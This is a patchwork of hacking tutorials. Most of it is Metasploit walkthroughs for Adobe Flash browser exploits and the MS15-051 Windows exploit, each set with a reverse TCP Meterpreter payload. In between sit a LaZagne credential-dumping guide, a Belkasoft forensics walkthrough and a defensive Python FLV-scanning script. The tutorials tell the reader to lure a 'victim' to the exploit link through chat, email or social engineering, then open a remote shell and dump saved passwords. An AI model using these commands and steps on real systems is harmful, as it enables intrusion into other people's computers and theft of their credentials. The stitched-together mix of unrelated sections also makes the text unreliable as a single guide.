Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

This module exploits a buffer overflow in Adobe Flash Player when handling Nellymoser-encoded audio inside an FLV video, as exploited in the wild in June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160; Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160; Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160; Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466; and Ubuntu 14.04.2 LTS, Firefox 35.01 and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043.
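
As an added example (not part of the original post or of the Metasploit module), the following defender-side triage script walks the tag list of an FLV file and reports audio tags whose SoundFormat field marks Nellymoser audio (values 4, 5 and 6 in the FLV audio tag header), the codec path named above. It identifies the codec only, not an exploit; the function names and the sample file are constructed for illustration.

```python
import struct

# FLV audio tag SoundFormat values (upper 4 bits of the first body byte).
NELLYMOSER_FORMATS = {4: "Nellymoser 16 kHz mono", 5: "Nellymoser 8 kHz mono", 6: "Nellymoser"}
TAG_AUDIO = 8

def find_nellymoser_tags(data: bytes):
    """Return (offset, codec, body_size) for every Nellymoser audio tag.

    Raises ValueError on a malformed container rather than reading past the
    buffer, because a triage tool must expect crafted input.
    """
    if len(data) < 13 or data[:3] != b"FLV":
        raise ValueError("not an FLV file")
    header_size = struct.unpack(">I", data[5:9])[0]
    if header_size < 9:
        raise ValueError("bad FLV header size")
    pos = header_size + 4  # skip header and PreviousTagSize0
    hits = []
    while pos + 11 <= len(data):
        tag_type = data[pos] & 0x1F
        body_size = int.from_bytes(data[pos + 1:pos + 4], "big")
        body = pos + 11  # tag header is 11 bytes
        if body + body_size > len(data):
            raise ValueError(f"tag at offset {pos} overruns the file")
        if tag_type == TAG_AUDIO and body_size > 0:
            sound_format = data[body] >> 4
            if sound_format in NELLYMOSER_FORMATS:
                hits.append((pos, NELLYMOSER_FORMATS[sound_format], body_size))
        pos = body + body_size + 4  # skip body and PreviousTagSize
    return hits

def _tag(tag_type: int, payload: bytes) -> bytes:
    """Build one tag plus trailing PreviousTagSize (constructed sample data)."""
    head = bytes([tag_type]) + len(payload).to_bytes(3, "big") + bytes(7)
    return head + payload + (11 + len(payload)).to_bytes(4, "big")

def build_sample() -> bytes:
    """Constructed FLV: MP3 audio tag, video tag, Nellymoser audio tag."""
    header = b"FLV" + bytes([1, 0x05]) + (9).to_bytes(4, "big") + bytes(4)
    return (header + _tag(8, bytes([0x2F]) + bytes(8))
            + _tag(9, bytes([0x12]) + bytes(8))
            + _tag(8, bytes([0x6E]) + bytes(16)))

if __name__ == "__main__":
    for offset, codec, size in find_nellymoser_tags(build_sample()):
        print(f"offset {offset}: {codec}, {size} bytes")
```

Nellymoser audio is a legitimate codec, so a hit is a reason to inspect the file and the Flash version that would play it, not a verdict.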

Exploit Targets
Windows 7
Windows 8
Firefox 38.0.5
Adobe Flash 18.0.0.160
Adobe Flash 11.2.202.466


Requirement
Attacker: Kali Linux

Victim PC: Windows 7


Now type use exploit/multi/windows/browser/adobe_flash_nellymoser_bof
msf exploit (adobe_flash_nellymoser_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_nellymoser_bof)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (adobe_flash_nellymoser_bof)>set srvhost 192.168.0.125
msf exploit (adobe_flash_nellymoser_bof)>set uripath /
msf exploit (adobe_flash_nellymoser_bof)>exploit  


Now give the following URL to your victim: http://192.168.0.125:8080

Send the link of the server to the victim via chat, email or any social engineering technique.
Now when the victim opens the link (http://192.168.0.125:8080), a session will be opened.


Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

Hack Remote Windows PC using Adobe Flash Player Drawing Fill Shader Memory Corruption

This module exploits a memory corruption that occurs when applying a Shader as a drawing fill, as exploited in the wild in June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188; Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188; Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188; and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/multi/windows/browser/adobe_flash_shader_drawing_fill
msf exploit (adobe_flash_shader_drawing_fill)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_shader_drawing_fill)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (adobe_flash_shader_drawing_fill)>set srvhost 192.168.0.125
msf exploit (adobe_flash_shader_drawing_fill)>set uripath /
msf exploit (adobe_flash_shader_drawing_fill)>exploit


Now give the following URL to your victim: http://192.168.0.125:8080

Send the link of the server to the victim via chat, email or any social engineering technique.
Now when the victim opens the link (http://192.168.0.125:8080), a session will be opened.


Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

Forensic Investigation of RAW Images using Belkasoft Evidence Center

First of all, download Belkasoft Evidence Center Ultimate from this link.


Click on New Option to select the Raw Image.


Enter the Case Name.
Select the Root folder where Forensic Evidence will be created.
Then type the name of the investigator and Case Description. Click Ok.


Now select the Raw Image and Check the Option Analyze Data Source. Click on Next.


Now Select from supported data types and click on Next.


Now Select all and Click on Finish.


To view the cached sites exactly as seen by the user, click on the Cache in Browsers option.


To see the list of downloaded files, click on Downloaded Files.



To check the list of sites visited by the user, select the Sites option.


To see the cookie list, click on the Cookies option.



Now click on the Documents option and then select the Found Documents option to see all the office document files found on the user's PC.


To see all the encrypted files, click on the Found Encrypted files option. It will detect more than 150 types of encrypted files. It is also possible to decrypt all these encrypted files within this product by installing Passware Kit Forensic integrated with the Belkasoft product.


To find the picture list, select Found Pictures in the Pictures option. To detect forgery in a picture, right-click on the picture, select Analyze Pictures and click on the Detect Forgery tab.


To find the recent files opened by Acrobat Reader, click on the Adobe Acrobat Reader Recent option.


To see recent applications run by the user, click on the Last Application and Paths in NTUSER.DAT option. NTUSER.DAT is a registry file in the Windows operating system. Every user profile contains an NTUSER.DAT file. It holds settings unique to that user, including the Documents folder, Start menu configuration, desktop properties and browsing history.


To see the files last selected by the user, click on Last Selected Files.


To check the recent files opened by the user, click on the Recent files option.


To see the latest searches by the user, click on the Searches option.


To find the files most recently accessed by the user, click on Recently accessed documents.

Hack Browsers, Chat, Databases, Mails, Wifi Password in Remote Windows or Linux PC

First hack the victim PC using Metasploit (Tutorial How to Hack Remote PC).

Once you have the meterpreter session, use the 'shell' command to get a command prompt on the target.

Now download the LaZagne project from here and extract it on your PC. You can find the lazagne.exe file in the folder.

Now use the upload command to send a file to the target system.



To launch all modules, type laZagne.exe all. It will dump all the passwords that it can find. You can see all saved passwords in Google Chrome.



You can see Windows secret passwords.


You can see all saved Wi-Fi profile passwords.


Hack Remote Windows PC using Windows Client Copy Image Win32k Exploit

This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/local/ms15_051_client_copy_image
msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_051_client_copy_image)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (ms15_051_client_copy_image)>set session 1
msf exploit (ms15_051_client_copy_image)>exploit